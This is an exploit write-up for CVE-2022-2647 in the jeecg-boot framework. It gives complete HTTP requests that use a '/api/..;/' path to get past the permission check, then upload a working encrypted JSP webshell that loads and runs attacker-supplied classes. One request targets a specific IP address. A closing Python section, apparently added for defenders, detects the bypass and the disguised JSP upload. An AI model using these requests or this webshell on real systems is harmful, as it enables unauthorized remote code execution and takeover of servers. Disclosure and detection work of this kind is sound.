CVE-2022-2647: Jeecg-boot Remote command execution - J0o1ey

A vulnerability was found in jeecg-boot. It has been declared as critical. This vulnerability affects unknown code of the file /api/. The manipulation of the argument file leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-205594 is the identifier assigned to this vulnerability.


Summary

In the jeecg-boot framework (https://github.com/jeecgboot/jeecg-boot), there is a vulnerability that allows reaching the file upload API by bypassing Shiro's permission check, which makes a webshell upload possible.

Details are as follows.

Details

HTTP Request

POST /api/..;/cgUploadController.do?ajaxSaveFile&sessionId=7211DABCDAF4D0AAB731C44848F0FB6C%27, HTTP/1.1
Host: ip
Content-Length: 902
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTneEAOeZrAbfrMH4
Accept: */*
Origin: http://ip
Referer: http://ip/api/..;/systemController.do?commonUpload&_=1655456862344
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=7211DABCDAF4D0AAB731C44848F0FB6C; Hm_lvt_098e6e84ab585bf0c2e6853604192b8b=1655456211; Hm_lpvt_098e6e84ab585bf0c2e6853604192b8b=1655456442
Connection: close

------WebKitFormBoundaryTneEAOeZrAbfrMH4
Content-Disposition: form-data; name="name"

skr.jsp
------WebKitFormBoundaryTneEAOeZrAbfrMH4
Content-Disposition: form-data; name="documentTitle"

blank
------WebKitFormBoundaryTneEAOeZrAbfrMH4
Content-Disposition: form-data; name="file"; filename="skr.jsp"
Content-Type: image/jpeg

<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*this key is the first 16 characters of the 32-character MD5 of the connection password; the default connection password is rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>
------WebKitFormBoundaryTneEAOeZrAbfrMH4--

Alternatively, the attacker can use this API:

POST /api/..;/commonController.do?parserXml HTTP/1.1
Host: 218.12.79.196:8081
Content-Length: 424
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzAtM8p8Ho292J3Vk
Accept: */*
Origin: http://218.12.79.196:8081
Referer: http://218.12.79.196:8081/api/..;/systemController.do?commonUpload&_=1655435878184
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=3D38F89CA6887B45CEFB41E4CA65A235; Hm_lvt_098e6e84ab585bf0c2e6853604192b8b=1655433472; Hm_lpvt_098e6e84ab585bf0c2e6853604192b8b=1655435715
Connection: close

------WebKitFormBoundaryzAtM8p8Ho292J3Vk
Content-Disposition: form-data; name="name"

per-index-photo.png
------WebKitFormBoundaryzAtM8p8Ho292J3Vk
Content-Disposition: form-data; name="documentTitle"

blank
------WebKitFormBoundaryzAtM8p8Ho292J3Vk
Content-Disposition: form-data; name="file"; filename="per-index-photo.jsp"
Content-Type: image/png

<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*this key is the first 16 characters of the 32-character MD5 of the connection password; the default connection password is rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>
------WebKitFormBoundaryzAtM8p8Ho292J3Vk--

Being able to upload an arbitrary JSP file in this way leads to remote command execution.
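As an added defender-side example (not from the advisory and not jeecg-boot code), the following Python parses a raw HTTP request and flags the two traits visible in the captures above: a `;` path parameter in the URI (assumed here to be the reason the request still matches an anonymous `/api/**` pattern while the servlet container resolves it to the upload controller), and a multipart file part whose `.jsp` filename contradicts its declared image Content-Type. The sample request is constructed and trimmed; it is not a real capture.

```python
import re
from urllib.parse import unquote
EXEC_EXTS = {"jsp", "jspx", "jspf"}

def effective_path(target: str) -> str:
    """Resolve the target like a servlet container: drop ';param' from each segment, collapse '..'."""
    segs = []
    for seg in unquote(target.split("?", 1)[0]).split("/"):
        seg = seg.split(";", 1)[0]            # '..;' becomes '..'
        if seg == "..":
            segs = segs[:-1]
        elif seg and seg != ".":
            segs.append(seg)
    return "/" + "/".join(segs)

def jsp_parts(body: str, boundary: str) -> list:
    """(filename, declared Content-Type) for each file part with a JSP-family extension."""
    hits = []
    for part in body.split("--" + boundary):
        m = re.search(r'filename="([^"]*)"', part)
        if not m or m.group(1).rsplit(".", 1)[-1].lower() not in EXEC_EXTS:
            continue
        ct = re.search(r"Content-Type:\s*([^\s;]+)", part)
        hits.append((m.group(1), ct.group(1).lower() if ct else ""))
    return hits

def analyze_request(raw: str) -> dict:
    """Flag the two traits of the CVE-2022-2647 captures in one raw HTTP request."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    target = request_line.split(" ", 2)[1]
    ctype = next((h.split(":", 1)[1] for h in header_lines
                  if h.lower().startswith("content-type:")), "")
    bm = re.search(r"boundary=(\S+)", ctype)
    parts = jsp_parts(body, bm.group(1)) if bm else []
    return {
        "path_param_bypass": ";" in target.split("?", 1)[0],  # '/api/..;/' style
        "effective_path": effective_path(target),
        "jsp_upload": [n for n, _ in parts],
        "mime_mismatch": [n for n, ct in parts if ct.startswith("image/")],
    }

# Constructed sample modelled on the first capture above (webshell body omitted).
SAMPLE = (
    "POST /api/..;/cgUploadController.do?ajaxSaveFile HTTP/1.1\r\n"
    "Content-Type: multipart/form-data; boundary=----X\r\n\r\n"
    '------X\r\nContent-Disposition: form-data; name="name"\r\n\r\nskr.jsp\r\n'
    '------X\r\nContent-Disposition: form-data; name="file"; filename="skr.jsp"\r\n'
    "Content-Type: image/jpeg\r\n\r\n<% /* payload omitted */ %>\r\n------X--\r\n"
)
```

The `effective_path` value shows the path the container actually dispatches to, which is what a WAF or access-log rule should be comparing against the protected URL list rather than the raw request line.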
